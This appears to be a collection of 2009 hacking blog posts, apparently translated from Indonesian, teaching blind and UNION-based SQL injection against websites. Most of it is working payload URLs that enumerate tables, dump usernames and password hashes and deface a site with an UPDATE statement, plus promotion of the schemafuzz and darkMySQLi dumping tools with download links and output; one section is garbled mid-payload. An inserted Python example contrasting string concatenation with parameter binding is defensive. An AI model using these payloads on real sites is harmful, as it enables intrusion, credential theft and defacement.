blind sqli Updated

•October 28, 2009

I'll try to explain blind SQL injection as simply as I can; I used to think it was really complicated… I'm not trying to lecture anyone, I'm just sharing what I have and what I can do…

OK, it all started because I was really bored… Every .go.id, co.id or whatever.id target had already been wiped out by the seniors here… In the end I stumbled onto a foreign site by accident… Let's just say the site is called

http://iseng.com/news.php?id=76009

For this target I used the SQL function mid(), which works almost the same as substring()…

I simply typed

http://iseng.com/news.php?id=76009 and 1=0
and the result was FALSE

http://iseng.com/news.php?id=76009 and 1=1
which evaluated to TRUE

Once I was sure the site was vulnerable, I did the injection (hehehehe…)

http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

Now, so that you all understand (hehehehe… I'm still learning myself and here I am explaining things…), I'll try to explain what the URL and the statement above mean…

~ mid(user(),1,1) means that in this case I don't know what the value of user is, so I deliberately left the “()” empty.

~ 1,1 is the position within that value.

~ CHAR converts from decimal.

~ 65 is that decimal value, and 65 is “A” in ASCII, so I start with 65.

So what happens now? The page will come back either true or false… In this case it is false, which means I have to try another value until it becomes true…

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(65)

FALSE
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(66)

TRUE!!!
http://iseng.com/news.php?id=76009 and mid(user(),1,1)=CHAR(67)

Finally I got true, and the value is 67 (C in ASCII)

Find the second value, and the way to do it is…

http://iseng.com/news.php?id=76009 and mid(user(),1,2)=CHAR(67,65)

Now the 1,1 has been changed to 1,2… So once you have found one, just change it to 1,3… 1,4 and so on…

Eventually I got true at number 82 (R in ASCII)

Keep going until you have the value of user, until it finally becomes

http://iseng.com/news.php?id=76009 and mid(user(),1,6)=CHAR(67,82,85,90,51,78)

67=C
82=R
85=U
90=Z
51=3
78=N

So the username turns out to be CRUZ3N (Wow…. what a funny coincidence ;p)

To find the password I just replace user() with database() and repeat all the steps above from the start until I get a true value…

Example:

http://iseng.com/news.php?id=76009 and mid(database(),1,5)=CHAR(75,69,82,69,78)

So the password obtained is…

75=K
69=E
82=R
69=E
78=N

So the username and password are CRUZ3N and KEREN…

It turns out Blind SQL Injection isn't all that annoying (just tedious…). They say this method is fairly effective against sites that filter SQL Injection… Is that true? No idea… My knowledge hasn't got that far yet…
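Why the "and 1=0" and "and 1=1" requests above return different pages, and what removes that difference, shown as an added example that is not code from the original post. It uses Python's sqlite3 as a stand-in for the site's MySQL backend; the news table, its single row, the id policy and all function names are assumptions made for the illustration.

```python
import re
import sqlite3

# Assumed policy for this sketch: article ids are short decimal integers.
ID_RE = re.compile(r"[0-9]{1,9}")


def make_db():
    """In-memory stand-in for the news table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (76009, 'Constructed sample article')")
    return db


def vulnerable_lookup(db, raw_id):
    """The 'before': the request parameter becomes part of the SQL text."""
    return db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()


def bound_lookup(db, raw_id):
    """Parameter binding: the whole string is compared as one value."""
    return db.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchall()


def hardened_lookup(db, raw_id):
    """Binding plus type validation, so malformed ids are refused up front."""
    if not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchall()


def page_for(lookup, db, raw_id):
    """What the visitor would observe: article, empty, error or rejected."""
    try:
        rows = lookup(db, raw_id)
    except ValueError:
        return "rejected"
    except sqlite3.Error:
        return "error"
    return "article" if rows else "empty"


def leaks_boolean(lookup, db, base_id="76009"):
    """True when the 1=1 and 1=0 probes are distinguishable from outside."""
    return (page_for(lookup, db, base_id + " and 1=1")
            != page_for(lookup, db, base_id + " and 1=0"))


if __name__ == "__main__":
    db = make_db()
    for lookup in (vulnerable_lookup, bound_lookup, hardened_lookup):
        print(lookup.__name__,
              "| plain id:", page_for(lookup, db, "76009"),
              "| oracle:", leaks_boolean(lookup, db),
              "| stray quote:", page_for(lookup, db, "76009'"))
```

Only the concatenating lookup answers the two probes differently; with binding, both probes are treated as one odd value and produce the same page.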

OK, that's it for now…
Apologies for any mistakes, and since I forgot, there are no screenshots (it would have been really cool to have them ;p).

Hopefully this very, very short and unremarkable explanation is useful…

Here are the ASCII codes, in case they come in handy…

Char Code Description

9 Tab
10 Line feed
13 Carriage return
' ' 32 Space
! 33 Exclamation mark
" 34 Quotation mark
# 35 Number sign
$ 36 Dollar sign
% 37 Percent sign
& 38 Ampersand
' 39 Apostrophe
( 40 Left parenthesis
) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< 60 Less-than sign
= 61 Equals sign
> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
\ 92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
 127 (not used)
€ 128 Euro sign Currency Symbols
129 (not used)
‚ 130 Single low-9 quotation mark General Punctuation
ƒ 131 Latin small letter f with hook Latin Extended-B
„ 132 Double low-9 quotation mark General Punctuation
… 133 Horizontal ellipsis General Punctuation
† 134 Dagger General Punctuation
‡ 135 Double dagger General Punctuation
ˆ 136 Modifier letter circumflex accent Spacing Modifier Letters
‰ 137 Per mille sign General Punctuation
Š 138 Latin capital letter S with caron Latin Extended-A
‹ 139 Single left-pointing angle quotation mark General Punctuation
Œ 140 Latin capital ligature OE Latin Extended-A
141 (not used)
Ž 142 Latin capital letter Z with caron Latin Extended-A
143 (not used)
144 (not used)
‘ 145 Left single quotation mark General Punctuation
’ 146 Right single quotation mark General Punctuation
“ 147 Left double quotation mark General Punctuation
” 148 Right double quotation mark General Punctuation
• 149 Bullet General Punctuation
– 150 En dash General Punctuation
— 151 Em dash General Punctuation
˜ 152 Small tilde Spacing Modifier Letters
™ 153 Trade mark sign Letterlike Symbols
š 154 Latin small letter s with caron Latin Extended-A
› 155 Single right-pointing angle quotation mark General Punctuation
œ 156 Latin small ligature oe Latin Extended-A
157 (not used)
ž 158 Latin small letter z with caron Latin Extended-A
Ÿ 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
¡ 161 Inverted exclamation mark
¢ 162 Cent sign
£ 163 Pound sign
¤ 164 Currency sign
¥ 165 Yen sign
¦ 166 Broken bar
§ 167 Section sign
¨ 168 Diaeresis
© 169 Copyright sign
ª 170 Feminine ordinal indicator
« 171 Left-pointing double angle quotation mark
¬ 172 Not sign
173 Soft hyphen
® 174 Registered sign
¯ 175 Macron
° 176 Degree sign
± 177 Plus-minus sign
² 178 Superscript two
³ 179 Superscript three
´ 180 Acute accent
µ 181 Micro sign
¶ 182 Pilcrow sign
· 183 Middle dot
¸ 184 Cedilla
¹ 185 Superscript one
º 186 Masculine ordinal indicator
» 187 Right-pointing double angle quotation mark
¼ 188 Vulgar fraction one quarter
½ 189 Vulgar fraction one half
¾ 190 Vulgar fraction three quarters
¿ 191 Inverted question mark
À 192 Latin capital letter A with grave
Á 193 Latin capital letter A with acute
Â 194 Latin capital letter A with circumflex
Ã 195 Latin capital letter A with tilde
Ä 196 Latin capital letter A with diaeresis
Å 197 Latin capital letter A with ring above
Æ 198 Latin capital letter AE
Ç 199 Latin capital letter C with cedilla
È 200 Latin capital letter E with grave
É 201 Latin capital letter E with acute
Ê 202 Latin capital letter E with circumflex
Ë 203 Latin capital letter E with diaeresis
Ì 204 Latin capital letter I with grave
Í 205 Latin capital letter I with acute
Î 206 Latin capital letter I with circumflex
Ï 207 Latin capital letter I with diaeresis
Ð 208 Latin capital letter Eth
Ñ 209 Latin capital letter N with tilde
Ò 210 Latin capital letter O with grave
Ó 211 Latin capital letter O with acute
Ô 212 Latin capital letter O with circumflex
Õ 213 Latin capital letter O with tilde
Ö 214 Latin capital letter O with diaeresis
× 215 Multiplication sign
Ø 216 Latin capital letter O with stroke
Ù 217 Latin capital letter U with grave
Ú 218 Latin capital letter U with acute
Û 219 Latin capital letter U with circumflex
Ü 220 Latin capital letter U with diaeresis
Ý 221 Latin capital letter Y with acute
Þ 222 Latin capital letter Thorn
ß 223 Latin small letter sharp s
à 224 Latin small letter a with grave
á 225 Latin small letter a with acute
â 226 Latin small letter a with circumflex
ã 227 Latin small letter a with tilde
ä 228 Latin small letter a with diaeresis
å 229 Latin small letter a with ring above
æ 230 Latin small letter ae
ç 231 Latin small letter c with cedilla
è 232 Latin small letter e with grave
é 233 Latin small letter e with acute
ê 234 Latin small letter e with circumflex
ë 235 Latin small letter e with diaeresis
ì 236 Latin small letter i with grave
í 237 Latin small letter i with acute
î 238 Latin small letter i with circumflex
ï 239 Latin small letter i with diaeresis
ð 240 Latin small letter eth
ñ 241 Latin small letter n with tilde
ò 242 Latin small letter o with grave
ó 243 Latin small letter o with acute
ô 244 Latin small letter o with circumflex
õ 245 Latin small letter o with tilde
ö 246 Latin small letter o with diaeresis
÷ 247 Division sign
ø 248 Latin small letter o with stroke
ù 249 Latin small letter u with grave
ú 250 Latin small letter u with acute
û 251 Latin small letter u with circumflex
ü 252 Latin small letter u with diaeresis
ý 253 Latin small letter y with acute
þ 254 Latin small letter thorn
ÿ 255 Latin small letter y with diaeresis

SQLi secret

•October 28, 2009

A site that interacts with its visitors has a “database” behind it.
In it there is “INFORMATION_SCHEMA”: tables are handled by “INFORMATION_SCHEMA.TABLES”, where the name field is “table_name”,
and columns are handled by “INFORMATION_SCHEMA.COLUMNS”, where the name field is “column_name”.

#there are 2 ways to inject:

1. through a form input
2. through the URL
what we cover here is injection through the URL only!

#commonly used commands:

1. ORDER BY | to find the number of columns
2. UNION SELECT | to pull information from a table or column
3. AND | to compare 2 conditions, true or false
4. OR | to require only 1 condition
5. -- | to terminate the statement
6. + | stands for a space
7. ' | the evil character
8. HAVING | to provoke an error
9. DATABASE() | to get the database name
10. USER() | to get the database user name
11. DATADIR() | to get the location of the database
12. CONCAT | to join 2 or more columns
13. GROUP_CONCAT | to show the grouped concatenation of columns
14. CONCAT_WS | same as concat
15. FROM | take data from
16. UPDATE | modify existing data
17. @@servername |

attack 1
========

1. find out whether it is vulnerable

http://www.site.com/news.asp?ArticleID=10+AND+1=0--
error
http://www.site.com/news.asp?ArticleID=10+AND+1=1--
no error, so the command works: site = vulnerable, inject mode = on :)

2. find the number of columns displayed on a page

http://www.site.com/news.asp?ArticleID=10+ORDER+BY+1--
normal
http://www.site.com/news.asp?ArticleID=10+ORDER+BY+2--
normal, repeat until there is an error
http://www.site.com/news.asp?ArticleID=10+ORDER+BY+4--
normal
http://www.site.com/news.asp?ArticleID=10+ORDER+BY+5--
error, so the number of columns is 4 because the error is at number 5

3. display a table name

http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,3,4+FROM+INFORMATION_SCHEMA.TABLES--

change the id to a negative number, for example “-1”; a secret number will show up in the page, and that number is our key for finding table names and so on
here, as an example, the number 3 shows up

http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES--

the result shows one table name, say “news”

4. find the table we want

http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name+news--

the table shown earlier was “news”; we add table news at the end of the syntax to look for the table name we want, for example the table “users”
repeat this step until we get the table “users”

5. display column names

http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='users'--
one column name will be shown, for example “id”, whereas we are looking for column names such as username, password; repeat as in the table search step above
http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='Users'+AND+column_name+'id'--

6. display the data

we already know the table and column names, for example table “user” and columns “username”, “password”
now it is time to look at the data in that table and those columns
http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,username,4+FROM+Users--
result = jhon
http://www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,password,4+FROM+Users--
result = santrina

conclusion,
we got one user with username = jhon and password = santrina
==========================================================================

Attack 2
========

1. find table and column names

http://www.site.com/news.asp?ArticleID=10+HAVING+1=1--
we get an error message

"Column 'news.id' is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause."

from that we know there is a table named “news” with a column “id” in it

2. find the column we want

http://www.site.com/news.asp?ArticleID=10+GROUP+BY+id+HAVING+1=1--
we use the group by command to reveal the next column name
look at the error message
"Column 'news.title' is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause."

3. change the site's title

http://www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title='Hacked by Crash'--
the command above causes every article title to become hacked by crash
http://www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title='Hacked by Crash'+WHERE+id=10--
this command changes only the title of article number 10!

update from “darkmysqli”

•October 28, 2009

After the success of schemafuzz.py, rsauron, the script's author, announced that the schemafuzz.py project is officially closed and replaced by a project he is developing, named darkMySQLi
print "\n|-------------------------------------------------------|"
print "| rsauron@gmail.com v1.6 |"
print "| 1/2009 darkMySQLi.py |"
print "| -- Multi Purpose MySQL Injection Tool -- |"
print "| Usage: darkMySQLi.py [options] |"
print "| -h help darkc0de.com |"
print "|-------------------------------------------------------|\n"

this program does much the same as schemafuzz.py, but is perhaps more powerful…

the script can be downloaded here:
http://rapidshare.com/files/211594510/darkmysqli16.rar
http://www.darkc0de.com/others/darkmysqli16.zip
http://tinyurl.com/darkMySQLi

schemafuzz v5.0

•October 28, 2009

Schemafuzz.py was written in Python by rsauron[@]gmail[dot]com from the darkc0de site

its purpose is to make it easier for SQL injectors to find the tables and columns of the SQL database being penetrated.

ok, without further ado, let's look closely at the following steps

first we look for a target with google and find:

for example

http://127.0.0.1/site/phpweb/forum.php?forum=1

before going further we need to know which commands to use.

like this: ./schemafuzz.py -h help

we find some of its commands, like these

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

step one

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

this is what we get

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

step two

--------------

once it is found, we copy the darkc0de URL in, so it looks like this

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

this is what we get

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

step three

---------------

Once we have found the database name, we continue to the next step

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

to find out whether we can load_file on the site, use this command

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

it will show something like this

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

it turns out we can't load_file but we can access its mysql database hehehe

to find out which databases exist on the site, we use a command like this

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

it will show something like this

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:58:15

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]webthings

[-] [01:58:17]

[-] Total URL Requests 30

[-] Done

next step

--------------------

how to find the user and password

we use the command --dump -D namadatabase -T namatabel -C namakolom (database name, table name, column name)

once we have the database name, table name and column names, we just enter a command like this

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthings -T wt_users -C name,password

eing ing eng….

ta-daaa…. out come the user and password

the result is below

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 02:08:47

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Dumping data from database "webthings" Table "wt_users"

[+] Column(s) ['name', 'password']

[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:

[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]

[-] Total URL Requests 4

[-] Done

don't forget to always check the schemafuzzlog.txt

after that we just crack the password with a program

see, friends, it's easy with schemafuzz, isn't it.

Blind SQLi

•October 28, 2009

SQL Injection Tutorial by Marezzi (MySQL)

In this tutorial I will describe how SQL injection works and how to
use it to get some useful information.

First of all: What is SQL injection?

It's one of the most common vulnerabilities in web applications today.
It allows an attacker to execute database queries through the URL and gain access
to some confidential information etc… (in short).

1. SQL Injection (classic or error based or whatever you call it) :D

2. Blind SQL Injection (the harder part)

So let's start with some action :D

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if it is vulnerable we add ' (quote) to the end of the URL,

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…"
or something similar

that means it is vulnerable to SQL injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

So how do we use it? We just keep incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like this: Unknown column '4' in 'order clause' or something like that)

that means that it has 3 columns, because we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* is not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let's say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) …"

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) 5 version.

we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)

we know that table admin exists…

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we see the password on the screen as a hash or in plain text, depending on how the database is set up :)

i.e. md5 hash, mysql hash, sha1…

now we must complete the query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get username:password displayed on screen, i.e. admin:admin or admin:somehash

when you have this, you can log in as admin or some superuser :D

if you can't guess the right table name, you can always try mysql.user (default)

it has user and password columns, so an example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc… :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is displayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username, user, login, password, pass, passwd etc… :D

if you wanna display column names for specific table use this query. (where clause)

let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

let's say that we found columns user, pass and email.

now to complete the query and put them all together :D

for that we use concat(), i described it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That's all in this part, now we can proceed to the harder part :)

2. Blind SQL Injection

Blind injection is a little more complicated than the classic injection but it can be done :D

I must mention, there is a very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let’s start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc…

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 80

ok this here pulls the first character from first user in table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ascii value

and then it is compared using the greater-than symbol > .

so if the ascii char is greater than 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.

then let’s check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

